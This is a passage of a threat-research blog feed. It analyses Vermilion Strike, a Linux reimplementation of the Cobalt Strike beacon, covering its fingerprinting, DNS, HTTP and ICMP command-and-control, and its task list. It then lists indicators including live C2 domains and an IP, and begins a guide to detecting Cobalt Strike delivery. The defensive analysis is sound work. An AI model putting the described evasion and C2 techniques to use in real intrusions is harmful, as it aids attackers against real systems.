&lt;figcaption&gt;294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc in VirusTotal&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig2.png" title="Vermilion Strike analysis in Intezer: https://analyze.intezer.com/files/294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Vermilion Strike analysis in Intezer: https://analyze.intezer.com/files/294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The file shares strings with previously seen Cobalt Strike samples and triggers
a number of YARA rules that detect encoded Cobalt Strike configurations. The
ELF file is built on a Red Hat Linux distribution. It uses OpenSSL via dynamic
linking. The shared object names for OpenSSL on Red Hat-based distributions are
different from other Linux distributions. Because of this, it can only run on
machines with Linux distribution based on Red Hat&amp;rsquo;s code base.&lt;/p&gt;
&lt;h3&gt;Initialization&lt;span class="hx:absolute hx:-mt-20" id="initialization"&gt;&lt;/span&gt;
&lt;a href="#initialization" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The sample starts by forcing itself to run in the background using &lt;code&gt;daemon&lt;/code&gt;. It
will decrypt the configuration, using the XOR key &lt;code&gt;0x69&lt;/code&gt;, shown in the
screenshot below. The key &lt;code&gt;0x69&lt;/code&gt; is a common value used by Cobalt Strike&amp;rsquo;s
encrypted configuration too. Vermilion Strike&amp;rsquo;s configuration format is the
same as Cobalt Strike. Tools used for extracting Cobalt Strike configurations
can also be used to extract Vermilion Strike configuration. The Windows
components of the configuration are ignored for this Linux version.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig3.png" title="Decoded configuration of the beacon" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decoded configuration of the beacon&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Further decryption is performed in a heap with decoded strings, keys, and
values required by the beacon for its operation. The beacon will then generate
a SHA256 hash sourced from a random number seeded from the thread ID. This
value will be used later in DNS beaconing. Next, a public RSA key will be
imported for later use.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig4.png" title="Importing of public RSA key to encrypt machine fingerprint" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Importing of public RSA key to encrypt machine fingerprint&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The beacon will begin fingerprinting the machine. A random number will be
generated and the process ID will be fetched. It will grab the kernel version
of the machine using &lt;code&gt;uname&lt;/code&gt;. Next, the beacon will fingerprint network
information through the &lt;code&gt;getifaddrs&lt;/code&gt; function. It will loop through the
interfaces looking for IPv4 addresses. It will gather the interface with an
address not equal to &lt;code&gt;127.0.0.1&lt;/code&gt; and stage the IPv4 address.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig5.png" title="Network interface fingerprinting" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Network interface fingerprinting&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Next, the beacon will fingerprint the entry in the local password database for
information about the current effective user ID of the process.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig6.png" title="Fingerprinting of local password database" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Fingerprinting of local password database&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The beacon will then fingerprint the hostname of the machine. The collected
information will be formatted into a string, encrypted with the public RSA key,
and base64 encoded, as is standard for communication with a Cobalt Strike
server. The stages are shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig7.png" title="Stages of formatting the machine fingerprint" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Stages of formatting the machine fingerprint&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Prepended to the fingerprint string is the value &lt;code&gt;1.0.1.LR&lt;/code&gt;. This appears to be
an internal version string. A similar string, &lt;code&gt;W1.0.1&lt;/code&gt;, was found in a newly
discovered Windows sample of Vermilion Strike that shares the same C2 and
malware functionality.&lt;/p&gt;
&lt;p&gt;The encrypted data is sent to the C2 server in a similar way that the metadata
is sent from a Cobalt Strike beacon to the C2 server. The payload that is
encrypted starts with the marker &lt;code&gt;0xbeef&lt;/code&gt;. The same marker is used by the
legitimate Cobalt Strike beacon.&lt;/p&gt;
&lt;h3&gt;Command and Control&lt;span class="hx:absolute hx:-mt-20" id="command-and-control"&gt;&lt;/span&gt;
&lt;a href="#command-and-control" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Command and Control is primarily performed over DNS but also available over
HTTP. This DNS-based approach for communications can help avoid traditional
defenses that monitor HTTP traffic. Commands are received via DNS Address (A)
and Text (TXT) records. The beacon first makes DNS requests out to hardcoded
subdomains and gets an IP address returned. Normally, DNS requests on hostnames
are intended to be translated into an IP address for which to visit. In this
case, the IP address returned is not used as an IP address but for triggers to
change the beacon behavior.&lt;/p&gt;
&lt;p&gt;Once the beacon gets the signal to download a task, it will perform a DNS TXT
query to the domain&amp;rsquo;s nameservers, as shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig8.png" title="Packet capture of C2 communication" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Packet capture of C2 communication&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The result of the TXT query is a base64 encoded and AES encrypted struct
containing task information. An example of a returned task is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig9.png" title="A DNS TXT query result for a task" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;A DNS TXT query result for a task&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;A decrypted task is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig10.png" title="Decrypted command" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decrypted command&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Tasks that the beacon can perform are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Change working directory&lt;/li&gt;
&lt;li&gt;Get current working directory&lt;/li&gt;
&lt;li&gt;Append/write to file&lt;/li&gt;
&lt;li&gt;Upload file to C2&lt;/li&gt;
&lt;li&gt;Execute command via &lt;code&gt;popen&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Get disk partitions&lt;/li&gt;
&lt;li&gt;List files&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The malware uses a separate thread to execute the tasks. The tasks are
scheduled as jobs via a semaphore to ensure not too many jobs are executed at
once. Vermilion Strike has a third way of communicating with the C2 server via
ICMP ping messages. The malware adds the current pid to the offset &lt;code&gt;0x4&lt;/code&gt; in the
header and the encrypted payload is sent as data in the ICMP packet. The data
size for an ICMP packet is limited to 65,507 bytes but the malware uses a size
limit of 64,000 bytes for the payload. The code for sending and processing ICMP
messages exists in the malware but the code for enabling it via the
configuration is not present. This means it has the capability but can&amp;rsquo;t be
configured to use it. This suggests it may be a new feature that hasn&amp;rsquo;t been
fully developed yet.&lt;/p&gt;
&lt;h3&gt;Links to Windows Files&lt;span class="hx:absolute hx:-mt-20" id="links-to-windows-files"&gt;&lt;/span&gt;
&lt;a href="#links-to-windows-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;When investigating this Linux file, we discovered related Windows samples. The
first sample we noticed was:
&lt;code&gt;3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc&lt;/code&gt;. This is a
32-bit EXE sample that shares a C2 IP address (&lt;code&gt;160.202.163[.]100&lt;/code&gt;). This is a
stager that will fetch a DLL from the C2 over HTTP and execute it in-memory.&lt;/p&gt;
&lt;p&gt;An example of the next stage DLL is
&lt;code&gt;7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492&lt;/code&gt;. This
sample, first noticed in 2019 by
&lt;a href="https://twitter.com/silascutler/status/1153696870499119104"target="_blank" rel="noopener"&gt;Silas Cutler&lt;/a&gt;, is
the Windows DLL equivalent of the ELF file. The functionality is almost exactly
the same, except for the Windows environment. A side-by-side comparison of the
configuration decoding function for the ELF and DLL beacons is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig11.png" title="Configuration decryption function comparison" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Configuration decryption function comparison&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The DLL has the same domains as the ELF for C2, as well as an additional
configured domain &lt;code&gt;amazon.hksupd[.]com&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Using the stager we managed to get a new payload from the server
(&lt;a href="https://analyze.intezer.com/files/e40370f463b4a4feb2d515a3fb64af1573523f03917b2fd9e7a9d0a741ef89a5"target="_blank" rel="noopener"&gt;e40370f463b4a4feb2d515a3fb64af1573523f03917b2fd9e7a9d0a741ef89a5&lt;/a&gt;).
It has a lot of shared code with the sample from 2019. This sample and another
Windows version of Vermilion Strike
(&lt;code&gt;c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5&lt;/code&gt;) includes a
similar version string as the ELF version. The version string in these samples
is &lt;code&gt;W1.0.1&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig12.png" title="Internal version string in recent Windows versions" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Internal version string in recent Windows versions&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Vermilion Strike and other Linux threats remain a constant threat. The
predominance of Linux servers in the cloud and its continued rise invites APTs
to modify their toolsets in order to navigate the existing environment. Linux
threats often have low detection rates compared to their Windows counterparts
due to reasons discussed in
&lt;a href="https://intezer.com/blog/malware-analysis/why-we-should-be-paying-more-attention-to-linux-threats/"target="_blank" rel="noopener"&gt;Why we Should be Paying More Attention to Linux Threats&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Vermilion Strike is not the only Linux port of Cobalt Strike&amp;rsquo;s Beacon. Another
example is the open-source project &lt;a href="https://github.com/darkr4y/geacon"target="_blank" rel="noopener"&gt;geacon&lt;/a&gt;,
a Go-based implementation. Vermilion Strike may not be the last Linux
implementation of Beacon.&lt;/p&gt;
&lt;h2&gt;Detection and Response&lt;span class="hx:absolute hx:-mt-20" id="detection-and-response"&gt;&lt;/span&gt;
&lt;a href="#detection-and-response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Intezer can detect both Linux and Windows variants of Vermilion Strike, based
on code reuse, TTPs, and strings. Shown below are the verdicts for both
versions.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig13.png" title="Intezer verdict of Windows version of Vermilion Strike" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer verdict of Windows version of Vermilion Strike&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Intezer
&lt;a href="https://analyze.intezer.com/files/07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f"target="_blank" rel="noopener"&gt;verdict&lt;/a&gt;
of Windows version of Vermilion Strike.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig14.png" title="Intezer verdict of Linux version of Vermilion Strike" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer verdict of Linux version of Vermilion Strike&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Intezer
&lt;a href="https://analyze.intezer.com/files/294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc"target="_blank" rel="noopener"&gt;verdict&lt;/a&gt;
of Linux version of Vermilion Strike.&lt;/p&gt;
&lt;h3&gt;Detect if a Machine in Your Network Has Been Compromised&lt;span class="hx:absolute hx:-mt-20" id="detect-if-a-machine-in-your-network-has-been-compromised"&gt;&lt;/span&gt;
&lt;a href="#detect-if-a-machine-in-your-network-has-been-compromised" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;We recommend using the IoCs section below to ensure that the Vermilion Strike
process does not exist anywhere on your system.&lt;/p&gt;
&lt;h3&gt;Response&lt;span class="hx:absolute hx:-mt-20" id="response"&gt;&lt;/span&gt;
&lt;a href="#response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;If you are a victim of this operation, take the following steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Kill the process and delete all files related to the malware.&lt;/li&gt;
&lt;li&gt;Make sure that your machine is clean and running only trusted code.&lt;/li&gt;
&lt;li&gt;Make sure that your software is up-to-date with the latest versions and
security patches and configured to security best practices.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Intezer would like to thank McAfee ATR for their help during the research
process.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;ELF&lt;span class="hx:absolute hx:-mt-20" id="elf"&gt;&lt;/span&gt;
&lt;a href="#elf" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;PE&lt;span class="hx:absolute hx:-mt-20" id="pe"&gt;&lt;/span&gt;
&lt;a href="#pe" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Stager&lt;span class="hx:absolute hx:-mt-20" id="stager"&gt;&lt;/span&gt;
&lt;a href="#stager" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;code&gt;3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc&lt;/code&gt;&lt;/p&gt;
&lt;h4&gt;Beacon&lt;span class="hx:absolute hx:-mt-20" id="beacon"&gt;&lt;/span&gt;
&lt;a href="#beacon" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;code&gt;7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;e40370f463b4a4feb2d515a3fb64af1573523f03917b2fd9e7a9d0a741ef89a5&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;C2&lt;span class="hx:absolute hx:-mt-20" id="c2"&gt;&lt;/span&gt;
&lt;a href="#c2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;160.202.163.100&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;update.microsofthk[.]com&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;update.microsoftkernel[.]com&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;amazon.hksupd[.]com&lt;/code&gt;&lt;/p&gt;</description></item><item><title>How to Detect Cobalt Strike</title><link>https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/</link><pubDate>Wed, 18 Aug 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/</guid><description>
&lt;h2&gt;Intro&lt;span class="hx:absolute hx:-mt-20" id="intro"&gt;&lt;/span&gt;
&lt;a href="#intro" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Cobalt Strike is a penetration testing tool created by Raphael Mudge in 2012.
To this day, it remains extremely popular in red team activities and used for
malicious purposes by threat actors. Cobalt Strike is popular due to its range
of deployment options, ease of use, ability to avoid detection by security
products, and a number of capabilities it has. It is for these reasons that
threat actors like Cobalt Strike. Since Cobalt Strike is widely used by a range
of actors, its lack of exclusivity makes attribution harder. Companies still
struggle to detect Cobalt Strike also due to the various defensive techniques
it has.&lt;/p&gt;
&lt;p&gt;This blog explains Cobalt Strike and practical steps to take if you believe
that you are being targeted or have been compromised by Cobalt Strike. We will
demonstrate some real world examples of Cobalt Strike delivery and steps to
detect each.&lt;/p&gt;
&lt;h2&gt;What is Cobalt Strike?&lt;span class="hx:absolute hx:-mt-20" id="what-is-cobalt-strike"&gt;&lt;/span&gt;
&lt;a href="#what-is-cobalt-strike" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Cobalt Strike is &lt;a href="https://www.cobaltstrike.com/"target="_blank" rel="noopener"&gt;marketed&lt;/a&gt; as &amp;ldquo;Software for
Adversary Simulations and Red Team Operations.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;It is a popular platform that allows users to
&lt;a href="https://www.cobaltstrike.com/features"target="_blank" rel="noopener"&gt;emulate&lt;/a&gt; advanced threats, perform
reconnaissance, hide communications, escalate privileges, move laterally across
the network, and deploy additional payloads. The main payload of Cobalt Strike
is called &amp;ldquo;&lt;a href="https://www.cobaltstrike.com/help-beacon"target="_blank" rel="noopener"&gt;Beacon&lt;/a&gt;.&amp;rdquo; The Beacon
payload is used to model advanced APT malware, and it can do the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Receive commands (either passively or from an interactive console)&lt;/li&gt;
&lt;li&gt;Egress communications over HTTP, HTTPS, and DNS&lt;/li&gt;
&lt;li&gt;Launch PowerShell&lt;/li&gt;
&lt;li&gt;Execute binaries&lt;/li&gt;
&lt;li&gt;Modify and query the Windows registry&lt;/li&gt;
&lt;li&gt;Inject malicious code into legitimate processes&lt;/li&gt;
&lt;li&gt;Log keystrokes&lt;/li&gt;
&lt;li&gt;Take screenshots&lt;/li&gt;
&lt;li&gt;Set up proxies&lt;/li&gt;
&lt;li&gt;Escalate privileges&lt;/li&gt;
&lt;li&gt;Bypass UAC&lt;/li&gt;
&lt;li&gt;Dump password hashes&lt;/li&gt;
&lt;li&gt;Scan ports among other abilities&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This tool is mainly used in red team operations for government agencies and
private enterprises, but it&amp;rsquo;s also a popular tool leveraged by cybercrime and
&lt;a href="https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware"target="_blank" rel="noopener"&gt;APT groups in cracked versions&lt;/a&gt;.
It is evident why Cobalt Strike is used by organizations and threat actors
alike because of the extensive suite of capabilities it possesses, and also due
to its ability to bypass defenses. It also comes with the feature to generate
&lt;a href="https://www.cobaltstrike.com/help-reporting"target="_blank" rel="noopener"&gt;reporting&lt;/a&gt; in which the attacking
team or threat actor can continuously study and improve their campaigns.&lt;/p&gt;
&lt;h2&gt;Why is it difficult to detect Cobalt Strike?&lt;span class="hx:absolute hx:-mt-20" id="why-is-it-difficult-to-detect-cobalt-strike"&gt;&lt;/span&gt;
&lt;a href="#why-is-it-difficult-to-detect-cobalt-strike" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Cobalt Strike is difficult to detect because of its several defense techniques.
Cobalt Strike payloads are usually shellcode encrypted with a rolling XOR key.
This makes static analysis difficult to conduct. This, combined with the
ability to configure many parts of the payload, makes hash-based detection
almost impossible. Cobalt Strike stagers are designed to be loaded and executed
only in-memory. This opens up a ton of possibilities for how this shellcode is
shipped, making signature-based detection on the delivery method a cat and
mouse game. Depending on how the code is delivered, the code can be injected
into other legitimate running processes, bypassing defenses that do not scan
legitimate processes or code in-memory.&lt;/p&gt;
&lt;h2&gt;How has Cobalt Strike been deployed?&lt;span class="hx:absolute hx:-mt-20" id="how-has-cobalt-strike-been-deployed"&gt;&lt;/span&gt;
&lt;a href="#how-has-cobalt-strike-been-deployed" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Cobalt Strike has many different ways for deployment. This flexibility has
helped attackers find many unconventional and creative ways to infect victims
with a payload. For an in-depth technical analysis of Cobalt Strike&amp;rsquo;s
deployment options and how they differ, check out either Avast&amp;rsquo;s
&lt;a href="https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/"target="_blank" rel="noopener"&gt;blog&lt;/a&gt;
or Cisco Talos'
&lt;a href="https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf"target="_blank" rel="noopener"&gt;white paper&lt;/a&gt;.
Let&amp;rsquo;s take a look at some real world examples of how Cobalt Strike is being
used in the wild. We will cover the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Macro-Laden Microsoft Office files&lt;/li&gt;
&lt;li&gt;Supply Chain Attack&lt;/li&gt;
&lt;li&gt;Living off the Land (LotL)&lt;/li&gt;
&lt;li&gt;Executables (EXE) files&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Macro-Laden Microsoft Office Files&lt;span class="hx:absolute hx:-mt-20" id="macro-laden-microsoft-office-files"&gt;&lt;/span&gt;
&lt;a href="#macro-laden-microsoft-office-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;An
&lt;a href="https://analyze.intezer.com/analyses/2eaedc79-0197-4907-b4e1-f609853bc04e"target="_blank" rel="noopener"&gt;example&lt;/a&gt;
of a Cobalt Strike payload being delivered to victims via Microsoft Excel
spreadsheets demonstrates that this tool is used in mass phishing campaigns,
not just targeted APT attacks. The attack starts by sending potential victims a
Microsoft OneDrive link from which an Excel (.xls) file is downloaded.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig1.png" title="OneDrive URLs sent to victims" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;OneDrive URLs sent to victims&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Using cloud storage links to deliver malicious files is a well-known strategy.
It leverages the good reputation of cloud provider domains such as Microsoft,
Amazon, and Google to bypass domain reputation-based security controls. This
link delivers an Excel file pretending to be an Apple Store invoice requesting
that the target &amp;ldquo;enable content to view receipt.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig2.png" title="Spreadsheet lure masquerading as an Apple Store receipt." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Spreadsheet lure masquerading as an Apple Store receipt.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Upon enablement of macros, the spreadsheet will fetch and execute the payload
in-memory.&lt;/p&gt;
&lt;h3&gt;How to Detect?&lt;span class="hx:absolute hx:-mt-20" id="how-to-detect"&gt;&lt;/span&gt;
&lt;a href="#how-to-detect" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;This can be difficult to detect, as there are multiple degrees of separation
before the Cobalt Strike payload is executed. Detection first requires dynamic
analysis in order to reach the Cobalt Strike stage. When this stage is reached,
the best ways to detect the running Cobalt Strike code are through static
signatures or genetic code analysis.&lt;/p&gt;
&lt;p&gt;When it comes to static signatures, it can be difficult to isolate the exact
area in-memory that you should run the signatures over. One way this can be
achieved is running the file through debugging tools and manually dumping
memory to perform signature analysis. This can be extremely time consuming and
requires a high degree of technical knowledge. Another possible way is to use a
sandbox and download memory dumps from a finished analysis in order to run
static analysis tools. This requires slightly less technical knowledge, but it
still can be time consuming. We suggest taking the suspicious document and
uploading it to Intezer Analyze to find out if Cobalt Strike is hidden
in-memory.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig3.png" title="Intezer Analyze result for Cobalt Strike payload." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer Analyze result for Cobalt Strike payload.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Supply Chain Attack&lt;span class="hx:absolute hx:-mt-20" id="supply-chain-attack"&gt;&lt;/span&gt;
&lt;a href="#supply-chain-attack" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;One of the biggest cybersecurity stories of 2020 was the SolarWinds supply
chain attack that compromised high-profile entities around the world. This
attack was done by an APT group known as NOBELIUM (UNC2452) leveraging the
&amp;ldquo;Orion&amp;rdquo; business software to distribute malware to private and public
organizations. Among the deployed malware was a Cobalt Strike loader dubbed
TEARDROP by FireEye. The variant was named
&lt;a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware"target="_blank" rel="noopener"&gt;Raindrop&lt;/a&gt;
by Symantec. The TEARDROP dropper is a memory-only DLL that runs as a service
spawning a thread that pulls the Cobalt Strike payload from a fake JPG file.&lt;/p&gt;
&lt;p&gt;The Raindrop variant is built from a modified version of 7-ZIP source code. It
uses a different custom packer than TEARDROP, also leveraging steganography to
locate the start of the encoded payload. Once the encoded payload has been
located, it extracts, decrypts, and decompresses the data to be executed as
shellcode.&lt;/p&gt;
&lt;h3&gt;How to Detect?&lt;span class="hx:absolute hx:-mt-20" id="how-to-detect-1"&gt;&lt;/span&gt;
&lt;a href="#how-to-detect-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;It can often be difficult to detect if your organization has been the victim of
a supply chain attack. It can be especially hard to collect forensic evidence
for an attack when it could be mixed in with the code of legitimate and large
files. Due to the nature of
&lt;a href="https://intezer.com/blog/malware-analysis/securing-the-software-supply-chain/"target="_blank" rel="noopener"&gt;supply chain attacks&lt;/a&gt;,
there are often a large number of machines in an organization infected at one
time. An action you can take is to run Intezer&amp;rsquo;s
&lt;a href="https://analyze.intezer.com/endpoint-analyses"target="_blank" rel="noopener"&gt;live endpoint scanner&lt;/a&gt; across
all machines in the organization, to get immediate visibility over all running
code and quickly identify infected machines by detecting any traces of
malicious code found in-memory. An example of a machine with Raindrop loading
Cobalt Strike is shown in the endpoint scan below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/cobalt-strike-detect-this-persistent-threat/images/fig4.png" title="Intezer Analyze endpoint scan result for Raindrop loading and executing a fileless Cobalt Strike payload." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer Analyze endpoint scan result for Raindrop loading and executing a fileless Cobalt Strike payload.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Living off the Land (LotL)&lt;span class="hx:absolute hx:-mt-20" id="living-off-the-land-lotl"&gt;&lt;/span&gt;
&lt;a href="#living-off-the-land-lotl" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Living off the Land (LotL) is the attack process of using legitimate and signed
tools, usually provided within the operating system, to execute malware. This
is a powerful tactic as it can result in unauthorized code being executed
within the memory space of a trusted process, evading malware defenses by
flying under the radar. This type of tactic also makes incident response
difficult, since analysts can&amp;rsquo;t just filter out known legitimate processes
during triage. All processes must be inspected in order to find that one needle
in the haystack.&lt;/p&gt;
